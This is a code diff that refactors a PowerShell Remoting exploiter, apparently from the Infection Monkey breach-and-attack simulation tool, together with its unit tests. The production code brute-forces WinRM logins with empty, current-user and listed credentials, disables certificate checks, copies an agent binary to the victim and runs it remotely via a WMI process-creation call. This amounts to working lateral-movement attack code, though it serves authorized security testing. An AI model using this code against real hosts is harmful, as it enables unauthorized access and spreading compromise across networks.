Merge pull request #1446 from guardicore/powershell-exploiter-refactor

Powershell exploiter refactor
This commit is contained in:
Mike Salvatore 2021-09-02 11:58:01 -04:00 committed by GitHub
commit 0ecbfdea38
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
10 changed files with 517 additions and 227 deletions

View File

@ -1,29 +1,29 @@
import logging
import os
from typing import Optional, Union
import pypsrp
import spnego
from pypsrp.exceptions import AuthenticationError
from pypsrp.powershell import PowerShell, RunspacePool
from urllib3 import connectionpool
from typing import List, Optional
import infection_monkey.monkeyfs as monkeyfs
from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit.consts import WIN_ARCH_32, WIN_ARCH_64
from infection_monkey.exploit.consts import WIN_ARCH_32
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.powershell_utils import utils
from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions
from infection_monkey.exploit.powershell_utils.credential_generation import get_credentials
from infection_monkey.exploit.powershell_utils.utils import (
IClient,
get_client_based_on_auth_options,
from infection_monkey.exploit.powershell_utils.auth_options import (
AUTH_NEGOTIATE,
ENCRYPTION_AUTO,
AuthOptions,
get_auth_options,
)
from infection_monkey.exploit.powershell_utils.credentials import Credentials, get_credentials
from infection_monkey.exploit.powershell_utils.powershell_client import (
AuthenticationError,
IPowerShellClient,
PowerShellClient,
)
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey_by_os
from infection_monkey.model import GET_ARCH_WINDOWS, VictimHost
from infection_monkey.model import VictimHost
from infection_monkey.utils.environment import is_windows_os
LOG = logging.getLogger(__name__)
logger = logging.getLogger(__name__)
TEMP_MONKEY_BINARY_FILEPATH = "./monkey_temp_bin"
@ -38,17 +38,8 @@ class PowerShellExploiter(HostExploiter):
_EXPLOITED_SERVICE = "PowerShell Remoting (WinRM)"
def __init__(self, host: VictimHost):
PowerShellExploiter._set_sensitive_packages_log_level_to_error()
super().__init__(host)
self.client = None
@staticmethod
def _set_sensitive_packages_log_level_to_error():
# If root logger is inherited, extensive and potentially sensitive info could be logged
sensitive_packages = [pypsrp, spnego, connectionpool]
for package in sensitive_packages:
logging.getLogger(package.__name__).setLevel(logging.ERROR)
self._client = None
def _exploit_host(self):
try:
@ -58,14 +49,12 @@ class PowerShellExploiter(HostExploiter):
return False
credentials = get_credentials(
self._config.exploit_user_list,
self._config.exploit_password_list,
is_windows_os(),
is_https=is_https,
self._config.exploit_user_list, self._config.exploit_password_list, is_windows_os()
)
auth_options = get_auth_options(credentials, is_https)
self.client = self._authenticate_via_brute_force(credentials)
if not self.client:
self._client = self._authenticate_via_brute_force(credentials, auth_options)
if not self._client:
return False
return self._execute_monkey_agent_on_victim()
@ -91,80 +80,84 @@ class PowerShellExploiter(HostExploiter):
raise PowerShellRemotingDisabledError("Powershell remoting seems to be disabled.")
def _try_http(self):
auth_options_http = AuthOptions(
username=self._config.exploit_user_list[0],
password=self._config.exploit_password_list[0],
is_https=False,
)
self._authenticate(auth_options_http)
self._try_ssl_login(use_ssl=False)
def _try_https(self):
auth_options_http = AuthOptions(
username=self._config.exploit_user_list[0],
password=self._config.exploit_password_list[0],
is_https=True,
)
self._authenticate(auth_options_http)
self._try_ssl_login(use_ssl=True)
def _authenticate_via_brute_force(self, credentials: [AuthOptions]) -> Optional[IClient]:
for credential in credentials:
def _try_ssl_login(self, use_ssl: bool):
credentials = Credentials(
username="dummy_username",
password="dummy_password",
)
auth_options = AuthOptions(
auth_type=AUTH_NEGOTIATE,
encryption=ENCRYPTION_AUTO,
ssl=use_ssl,
)
PowerShellClient(self.host.ip_addr, credentials, auth_options)
def _authenticate_via_brute_force(
self, credentials: List[Credentials], auth_options: List[AuthOptions]
) -> Optional[IPowerShellClient]:
for (creds, opts) in zip(credentials, auth_options):
try:
client = self._authenticate(credential)
client = PowerShellClient(self.host.ip_addr, creds, opts)
LOG.info(
logger.info(
f"Successfully logged into {self.host.ip_addr} using Powershell. User: "
f"{credential.username}"
f"{creds.username}"
)
self.report_login_attempt(True, credential.username, credential.password)
self.report_login_attempt(True, creds.username, creds.password)
return client
except Exception as ex: # noqa: F841
LOG.debug(
logger.debug(
f"Error logging into {self.host.ip_addr} using Powershell. User: "
f"{credential.username}, Error: {ex}"
f"{creds.username}, Error: {ex}"
)
self.report_login_attempt(False, credential.username, credential.password)
self.report_login_attempt(False, creds.username, creds.password)
return None
def _authenticate(self, auth_options: AuthOptions) -> IClient:
client = get_client_based_on_auth_options(self.host.ip_addr, auth_options)
# attempt to execute dir command to know if authentication was successful
client.execute_cmd("dir")
return client
def _execute_monkey_agent_on_victim(self) -> bool:
arch = self._get_host_arch()
arch = self._client.get_host_architecture()
self.is_32bit = arch == WIN_ARCH_32
self._write_virtual_file_to_local_path()
logger.debug(f"Host architecture is {arch}")
monkey_path_on_victim = (
self._config.dropper_target_path_win_32
if self.is_32bit
else self._config.dropper_target_path_win_64
)
is_monkey_copy_successful = self._copy_monkey_binary_to_victim(monkey_path_on_victim)
is_monkey_copy_successful = self._copy_monkey_binary_to_victim(monkey_path_on_victim)
if is_monkey_copy_successful:
logger.info("Successfully copied the monkey binary to the victim.")
self._run_monkey_executable_on_victim(monkey_path_on_victim)
else:
logger.error("Failed to copy the monkey binary to the victim.")
return False
return True
def _get_host_arch(self) -> Union[WIN_ARCH_32, WIN_ARCH_64]:
output = self._execute_cmd_on_host(GET_ARCH_WINDOWS)
if "64-bit" in output:
return WIN_ARCH_64
else:
return WIN_ARCH_32
def _copy_monkey_binary_to_victim(self, monkey_path_on_victim) -> bool:
try:
self._write_virtual_file_to_local_path()
def _execute_cmd_on_host(self, cmd: str) -> str:
output, _, _ = self.client.execute_cmd(cmd)
return output
logger.info(f"Attempting to copy the monkey agent binary to {self.host.ip_addr}")
is_monkey_copy_successful = self._client.copy_file(
TEMP_MONKEY_BINARY_FILEPATH, monkey_path_on_victim
)
except Exception as ex:
raise ex
finally:
if os.path.isfile(TEMP_MONKEY_BINARY_FILEPATH):
os.remove(TEMP_MONKEY_BINARY_FILEPATH)
return is_monkey_copy_successful
def _write_virtual_file_to_local_path(self) -> None:
monkey_fs_path = get_target_monkey_by_os(is_windows=True, is_32bit=self.is_32bit)
@ -173,30 +166,13 @@ class PowerShellExploiter(HostExploiter):
with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file:
monkey_local_file.write(monkey_virtual_file.read())
def _copy_monkey_binary_to_victim(self, dest: str) -> bool:
LOG.debug(f"Attempting to copy the monkey agent binary to {self.host.ip_addr}")
try:
self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, dest)
LOG.info(f"Successfully copied the monkey agent binary to {self.host.ip_addr}")
return True
except Exception as ex:
LOG.error(f"Failed to copy the monkey agent binary to {self.host.ip_addr}: {ex}")
return False
finally:
os.remove(TEMP_MONKEY_BINARY_FILEPATH)
def _run_monkey_executable_on_victim(self, executable_path) -> None:
monkey_execution_command = utils.build_monkey_execution_command(
self.host, get_monkey_depth() - 1, executable_path
)
LOG.debug(
f"Attempting to execute the monkey agent on remote host "
f'{self.host.ip_addr} with commmand "{monkey_execution_command}"'
logger.info(
f"Attempting to execute the monkey agent on remote host " f"{self.host.ip_addr}"
)
with self.client.wsman, RunspacePool(self.client.wsman) as pool:
ps = PowerShell(pool)
ps.add_cmdlet("Invoke-WmiMethod").add_parameter("path", "win32_process").add_parameter(
"name", "create"
).add_parameter("ArgumentList", monkey_execution_command)
ps.invoke()
self._client.execute_cmd_as_detached_process(monkey_execution_command)

View File

@ -1,9 +1,30 @@
from dataclasses import dataclass
from typing import Union
from typing import List
from infection_monkey.exploit.powershell_utils.credentials import Credentials
AUTH_BASIC = "basic"
AUTH_NEGOTIATE = "negotiate"
ENCRYPTION_AUTO = "auto"
ENCRYPTION_NEVER = "never"
@dataclass
class AuthOptions:
username: Union[str, None]
password: Union[str, None]
is_https: bool
auth_type: str
encryption: str
ssl: bool
def get_auth_options(credentials: List[Credentials], use_ssl: bool) -> List[AuthOptions]:
auth_options = []
for creds in credentials:
# Passwordless login only works with SSL false, AUTH_BASIC and ENCRYPTION_NEVER
ssl = False if creds.password == "" else use_ssl
auth_type = AUTH_BASIC if creds.password == "" else AUTH_NEGOTIATE
encryption = ENCRYPTION_NEVER if creds.password == "" else ENCRYPTION_AUTO
auth_options.append(AuthOptions(auth_type, encryption, ssl))
return auth_options

View File

@ -1,46 +0,0 @@
from itertools import product
from typing import List
from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions
def get_credentials(
usernames: List[str], passwords: List[str], is_windows: bool, is_https: bool
) -> List[AuthOptions]:
credentials = []
credentials.extend(_get_empty_credentials(is_windows))
credentials.extend(_get_username_only_credentials(usernames, is_windows))
credentials.extend(_get_username_password_credentials(usernames, passwords, is_https=is_https))
return credentials
def _get_empty_credentials(is_windows: bool) -> List[AuthOptions]:
if is_windows:
return [AuthOptions(username=None, password=None, is_https=False)]
return []
def _get_username_only_credentials(usernames: List[str], is_windows: bool) -> List[AuthOptions]:
credentials = [
AuthOptions(username=username, password="", is_https=False) for username in usernames
]
if is_windows:
credentials.extend(
[AuthOptions(username=username, password=None, is_https=True) for username in usernames]
)
return credentials
def _get_username_password_credentials(
usernames: List[str], passwords: List[str], is_https: bool
) -> List[AuthOptions]:
username_password_pairs = product(usernames, passwords)
return [
AuthOptions(credentials[0], credentials[1], is_https=is_https)
for credentials in username_password_pairs
]

View File

@ -0,0 +1,50 @@
from dataclasses import dataclass
from itertools import product
from typing import List, Union
@dataclass
class Credentials:
username: Union[str, None]
password: Union[str, None]
def get_credentials(
usernames: List[str], passwords: List[str], is_windows: bool
) -> List[Credentials]:
credentials = []
credentials.extend(_get_empty_credentials(is_windows))
credentials.extend(_get_username_only_credentials(usernames, is_windows))
credentials.extend(_get_username_password_credentials(usernames, passwords))
return credentials
# On Windows systems, when username == None and password == None, the current user's credentials
# will be used to attempt to log into the victim.
def _get_empty_credentials(is_windows: bool) -> List[Credentials]:
if is_windows:
return [Credentials(username=None, password=None)]
return []
# On Windows systems, when password == None, the current user's password will bu used to attempt to
# log into the victim.
def _get_username_only_credentials(usernames: List[str], is_windows: bool) -> List[Credentials]:
credentials = [Credentials(username=username, password="") for username in usernames]
if is_windows:
credentials.extend(
[Credentials(username=username, password=None) for username in usernames]
)
return credentials
def _get_username_password_credentials(
usernames: List[str], passwords: List[str]
) -> List[Credentials]:
username_password_pairs = product(usernames, passwords)
return [Credentials(credentials[0], credentials[1]) for credentials in username_password_pairs]

View File

@ -0,0 +1,99 @@
import abc
import logging
from typing import Union
import pypsrp
import spnego
from pypsrp.client import Client
from pypsrp.exceptions import AuthenticationError # noqa: F401
from pypsrp.powershell import PowerShell, RunspacePool
from typing_extensions import Protocol
from urllib3 import connectionpool
from infection_monkey.exploit.consts import WIN_ARCH_32, WIN_ARCH_64
from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions
from infection_monkey.exploit.powershell_utils.credentials import Credentials
from infection_monkey.model import GET_ARCH_WINDOWS
logger = logging.getLogger(__name__)
CONNECTION_TIMEOUT = 3 # Seconds
def _set_sensitive_packages_log_level_to_error():
# If root logger is inherited, extensive and potentially sensitive info could be logged
sensitive_packages = [pypsrp, spnego, connectionpool]
for package in sensitive_packages:
logging.getLogger(package.__name__).setLevel(logging.ERROR)
class IPowerShellClient(Protocol, metaclass=abc.ABCMeta):
@abc.abstractmethod
def execute_cmd(self, cmd: str) -> str:
pass
@abc.abstractmethod
def get_host_architecture(self) -> Union[WIN_ARCH_32, WIN_ARCH_64]:
pass
@abc.abstractmethod
def copy_file(self, src: str, dest: str) -> bool:
pass
@abc.abstractmethod
def execute_cmd_as_detached_process(self, cmd: str):
pass
class PowerShellClient(IPowerShellClient):
def __init__(self, ip_addr, credentials: Credentials, auth_options: AuthOptions):
_set_sensitive_packages_log_level_to_error()
self._ip_addr = ip_addr
self._client = Client(
ip_addr,
username=credentials.username,
password=credentials.password,
cert_validation=False,
auth=auth_options.auth_type,
encryption=auth_options.encryption,
ssl=auth_options.ssl,
connection_timeout=CONNECTION_TIMEOUT,
)
# attempt to execute dir command to know if authentication was successful
self.execute_cmd("dir")
def execute_cmd(self, cmd: str) -> str:
output, _, _ = self._client.execute_cmd(cmd)
return output
def get_host_architecture(self) -> Union[WIN_ARCH_32, WIN_ARCH_64]:
output = self._client.execute_cmd(GET_ARCH_WINDOWS)
if "64-bit" in output:
return WIN_ARCH_64
return WIN_ARCH_32
def copy_file(self, src: str, dest: str) -> bool:
try:
self._client.copy(src, dest)
logger.debug(f"Successfully copied {src} to {dest} on {self._ip_addr}")
return True
except Exception as ex:
logger.error(f"Failed to copy {src} to {dest} on {self._ip_addr}: {ex}")
return False
def execute_cmd_as_detached_process(self, cmd: str):
logger.debug(
f"Attempting to execute a command on the remote host as a detached process - "
f"Host: {self._ip_addr}, Command: {cmd}"
)
with self._client.wsman, RunspacePool(self._client.wsman) as pool:
ps = PowerShell(pool)
ps.add_cmdlet("Invoke-WmiMethod").add_parameter("path", "win32_process").add_parameter(
"name", "create"
).add_parameter("ArgumentList", cmd)
ps.invoke()

View File

@ -1,7 +1,3 @@
from pypsrp.client import Client
from typing_extensions import Protocol
from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions
from infection_monkey.model import DROPPER_ARG, RUN_MONKEY, VictimHost
from infection_monkey.utils.commands import build_monkey_commandline
@ -19,38 +15,3 @@ def build_monkey_execution_command(host: VictimHost, depth: int, executable_path
"monkey_type": DROPPER_ARG,
"parameters": monkey_params,
}
AUTH_BASIC = "basic"
AUTH_NEGOTIATE = "negotiate"
ENCRYPTION_AUTO = "auto"
ENCRYPTION_NEVER = "never"
CONNECTION_TIMEOUT = 3 # Seconds
class IClient(Protocol):
def execute_cmd(self, cmd: str):
pass
def get_client_based_on_auth_options(ip_addr: str, auth_options: AuthOptions) -> IClient:
# Passwordless login only works with SSL false, AUTH_BASIC and ENCRYPTION_NEVER
if auth_options.password == "":
ssl = False
else:
ssl = auth_options.is_https
auth = AUTH_NEGOTIATE if auth_options.password != "" else AUTH_BASIC
encryption = ENCRYPTION_AUTO if auth_options.password != "" else ENCRYPTION_NEVER
return Client(
ip_addr,
username=auth_options.username,
password=auth_options.password,
cert_validation=False,
ssl=ssl,
auth=auth,
encryption=encryption,
connection_timeout=CONNECTION_TIMEOUT,
)

View File

@ -0,0 +1,87 @@
# from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions
from infection_monkey.exploit.powershell_utils.auth_options import (
AUTH_BASIC,
AUTH_NEGOTIATE,
ENCRYPTION_AUTO,
ENCRYPTION_NEVER,
get_auth_options,
)
from infection_monkey.exploit.powershell_utils.credentials import Credentials
CREDENTIALS = [
Credentials("user1", "password1"),
Credentials("user2", ""),
Credentials("user3", None),
]
def test_get_auth_options__ssl_true_with_password():
auth_options = get_auth_options(CREDENTIALS, use_ssl=True)
assert auth_options[0].ssl
def test_get_auth_options__ssl_true_empty_password():
auth_options = get_auth_options(CREDENTIALS, use_ssl=True)
assert not auth_options[1].ssl
def test_get_auth_options__ssl_true_none_password():
auth_options = get_auth_options(CREDENTIALS, use_ssl=True)
assert auth_options[2].ssl
def test_get_auth_options__ssl_false_with_password():
auth_options = get_auth_options(CREDENTIALS, use_ssl=False)
assert not auth_options[0].ssl
def test_get_auth_options__ssl_false_empty_password():
auth_options = get_auth_options(CREDENTIALS, use_ssl=False)
assert not auth_options[1].ssl
def test_get_auth_options__ssl_false_none_password():
auth_options = get_auth_options(CREDENTIALS, use_ssl=False)
assert not auth_options[2].ssl
def test_get_auth_options__auth_type_with_password():
auth_options = get_auth_options(CREDENTIALS, use_ssl=False)
assert auth_options[0].auth_type == AUTH_NEGOTIATE
def test_get_auth_options__auth_type_empty_password():
auth_options = get_auth_options(CREDENTIALS, use_ssl=False)
assert auth_options[1].auth_type == AUTH_BASIC
def test_get_auth_options__auth_type_none_password():
auth_options = get_auth_options(CREDENTIALS, use_ssl=False)
assert auth_options[2].auth_type == AUTH_NEGOTIATE
def test_get_auth_options__encryption_with_password():
auth_options = get_auth_options(CREDENTIALS, use_ssl=False)
assert auth_options[0].encryption == ENCRYPTION_AUTO
def test_get_auth_options__encryption_empty_password():
auth_options = get_auth_options(CREDENTIALS, use_ssl=False)
assert auth_options[1].encryption == ENCRYPTION_NEVER
def test_get_auth_options__encryption_none_password():
auth_options = get_auth_options(CREDENTIALS, use_ssl=False)
assert auth_options[2].encryption == ENCRYPTION_AUTO

View File

@ -0,0 +1,44 @@
from infection_monkey.exploit.powershell_utils.credentials import Credentials, get_credentials
TEST_USERNAMES = ["user1", "user2"]
TEST_PASSWORDS = ["p1", "p2"]
def test_get_credentials__empty_windows_true():
credentials = get_credentials([], [], True)
assert len(credentials) == 1
assert credentials[0] == Credentials(username=None, password=None)
def test_get_credentials__empty_windows_false():
credentials = get_credentials([], [], False)
assert len(credentials) == 0
def test_get_credentials__username_only_windows_true():
credentials = get_credentials(TEST_USERNAMES, [], True)
assert len(credentials) == 5
assert Credentials(username=TEST_USERNAMES[0], password="") in credentials
assert Credentials(username=TEST_USERNAMES[1], password="") in credentials
assert Credentials(username=TEST_USERNAMES[0], password=None) in credentials
assert Credentials(username=TEST_USERNAMES[1], password=None) in credentials
def test_get_credentials__username_only_windows_false():
credentials = get_credentials(TEST_USERNAMES, [], False)
assert len(credentials) == 2
assert Credentials(username=TEST_USERNAMES[0], password="") in credentials
assert Credentials(username=TEST_USERNAMES[1], password="") in credentials
def test_get_credentials__username_password_windows_true():
credentials = get_credentials(TEST_USERNAMES, TEST_PASSWORDS, True)
assert len(credentials) == 9
for user in TEST_USERNAMES:
for password in TEST_PASSWORDS:
assert Credentials(username=user, password=password) in credentials

View File

@ -1,51 +1,6 @@
from infection_monkey.exploit.powershell_utils import utils
from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions
from infection_monkey.exploit.powershell_utils.credential_generation import get_credentials
from infection_monkey.model.host import VictimHost
TEST_USERNAMES = ["user1", "user2"]
TEST_PASSWORDS = ["p1", "p2"]
def test_get_credentials__empty_windows_true():
credentials = get_credentials([], [], True, True)
assert len(credentials) == 1
assert credentials[0] == AuthOptions(username=None, password=None, is_https=False)
def test_get_credentials__empty_windows_false():
credentials = get_credentials([], [], False, True)
assert len(credentials) == 0
def test_get_credentials__username_only_windows_true():
credentials = get_credentials(TEST_USERNAMES, [], True, True)
assert len(credentials) == 5
assert AuthOptions(username=TEST_USERNAMES[0], password="", is_https=False) in credentials
assert AuthOptions(username=TEST_USERNAMES[1], password="", is_https=False) in credentials
assert AuthOptions(username=TEST_USERNAMES[0], password=None, is_https=True) in credentials
assert AuthOptions(username=TEST_USERNAMES[1], password=None, is_https=True) in credentials
def test_get_credentials__username_only_windows_false():
credentials = get_credentials(TEST_USERNAMES, [], False, True)
assert len(credentials) == 2
assert AuthOptions(username=TEST_USERNAMES[0], password="", is_https=False) in credentials
assert AuthOptions(username=TEST_USERNAMES[1], password="", is_https=False) in credentials
def test_get_credentials__username_password_windows_true():
credentials = get_credentials(TEST_USERNAMES, TEST_PASSWORDS, True, True)
assert len(credentials) == 9
for user in TEST_USERNAMES:
for password in TEST_PASSWORDS:
assert AuthOptions(username=user, password=password, is_https=True) in credentials
def test_build_monkey_execution_command():
host = VictimHost("127.0.0.1")

View File

@ -0,0 +1,143 @@
from collections import namedtuple
from unittest.mock import MagicMock
import pytest
from infection_monkey.exploit import powershell
from infection_monkey.exploit.consts import WIN_ARCH_32, WIN_ARCH_64
from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions
from infection_monkey.exploit.powershell_utils.credentials import Credentials
from infection_monkey.model.host import VictimHost
USER_LIST = ["user1", "user2"]
PASSWORD_LIST = ["pass1", "pass2"]
DROPPER_TARGET_PATH_32 = "C:\\agent32"
DROPPER_TARGET_PATH_64 = "C:\\agent64"
Config = namedtuple(
"Config",
[
"exploit_user_list",
"exploit_password_list",
"dropper_target_path_win_32",
"dropper_target_path_win_64",
],
)
class TestAuthenticationError(Exception):
pass
@pytest.fixture
def powershell_exploiter(monkeypatch):
host = VictimHost("127.0.0.1")
pe = powershell.PowerShellExploiter(host)
pe._config = Config(USER_LIST, PASSWORD_LIST, DROPPER_TARGET_PATH_32, DROPPER_TARGET_PATH_64)
monkeypatch.setattr(powershell, "AuthenticationError", TestAuthenticationError)
# It's regrettable to mock out a private method on the PowerShellExploiter instance object, but
# it's necessary to avoid having to deal with the monkeyfs
monkeypatch.setattr(pe, "_write_virtual_file_to_local_path", lambda: None)
return pe
def test_powershell_disabled(monkeypatch, powershell_exploiter):
mock_powershell_client = MagicMock(side_effect=Exception)
monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client)
success = powershell_exploiter.exploit_host()
assert not success
def test_powershell_http(monkeypatch, powershell_exploiter):
def allow_http(_, credentials: Credentials, auth_options: AuthOptions):
if not auth_options.ssl:
raise TestAuthenticationError
else:
raise Exception
mock_powershell_client = MagicMock(side_effect=allow_http)
monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client)
powershell_exploiter.exploit_host()
for call_args in mock_powershell_client.call_args_list:
assert not call_args[0][2].ssl
def test_powershell_https(monkeypatch, powershell_exploiter):
def allow_https(_, credentials: Credentials, auth_options: AuthOptions):
if auth_options.ssl:
raise TestAuthenticationError
else:
raise Exception
mock_powershell_client = MagicMock(side_effect=allow_https)
monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client)
powershell_exploiter.exploit_host()
for call_args in mock_powershell_client.call_args_list:
if call_args[0][1].password != "" and call_args[0][1].password != "dummy_password":
assert call_args[0][2].ssl
def test_no_valid_credentials(monkeypatch, powershell_exploiter):
mock_powershell_client = MagicMock(side_effect=TestAuthenticationError)
monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client)
success = powershell_exploiter.exploit_host()
assert not success
def authenticate(mock_client):
def inner(_, credentials: Credentials, auth_options: AuthOptions):
if credentials.username == "user1" and credentials.password == "pass2":
return mock_client
else:
raise TestAuthenticationError("Invalid credentials")
return inner
@pytest.mark.parametrize(
"dropper_target_path,arch",
[(DROPPER_TARGET_PATH_32, WIN_ARCH_32), (DROPPER_TARGET_PATH_64, WIN_ARCH_64)],
)
def test_successful_copy(monkeypatch, powershell_exploiter, dropper_target_path, arch):
mock_client = MagicMock()
mock_client.get_host_architecture = lambda: arch
mock_client.copy_file = MagicMock(return_value=True)
mock_powershell_client = MagicMock(side_effect=authenticate(mock_client))
monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client)
success = powershell_exploiter.exploit_host()
assert dropper_target_path in mock_client.copy_file.call_args[0][1]
assert success
def test_failed_copy(monkeypatch, powershell_exploiter):
mock_client = MagicMock()
mock_client.get_host_architecture = lambda: WIN_ARCH_32
mock_client.copy_file = MagicMock(return_value=False)
mock_powershell_client = MagicMock(side_effect=authenticate(mock_client))
monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client)
success = powershell_exploiter.exploit_host()
assert not success
def test_failed_monkey_execution(monkeypatch, powershell_exploiter):
mock_client = MagicMock()
mock_client.get_host_architecture = lambda: WIN_ARCH_32
mock_client.copy_file = MagicMock(return_value=True)
mock_client.execute_cmd_as_detached_process = MagicMock(side_effect=Exception)
mock_powershell_client = MagicMock(side_effect=authenticate(mock_client))
monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client)
success = powershell_exploiter.exploit_host()
assert not success